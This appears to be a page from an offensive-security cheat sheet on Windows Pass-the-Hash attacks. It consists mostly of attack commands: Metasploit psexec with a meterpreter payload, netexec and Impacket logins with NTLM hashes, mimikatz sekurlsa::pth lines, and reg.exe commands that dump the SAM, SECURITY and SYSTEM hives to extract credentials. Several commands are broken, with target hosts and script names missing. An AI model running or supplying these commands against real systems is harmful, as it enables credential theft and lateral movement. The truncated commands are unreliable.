Skip to content

Hash - Pass-the-Hash

The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.

  • Metasploit
    use exploit/windows/smb/psexec
    set RHOST
    set SMBUser jarrieta
    set SMBPass nastyCutt3r  
    # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
    # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
    set PAYLOAD windows/meterpreter/bind_tcp
  • netexec
    nxc smb -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
  • Impacket suite
    proxychains python ./ jarrieta@ -hashes :489a04c09a5debbc9b975356693e179d
  • Windows RDP and mimikatz
    sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
    sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin"

You can extract the local SAM database to find the local administrator hash :

C:\> reg.exe save hklm\sam c:\temp\
C:\> reg.exe save hklm\security c:\temp\
C:\> reg.exe save hklm\system c:\temp\
$ -sam -security -system LOCAL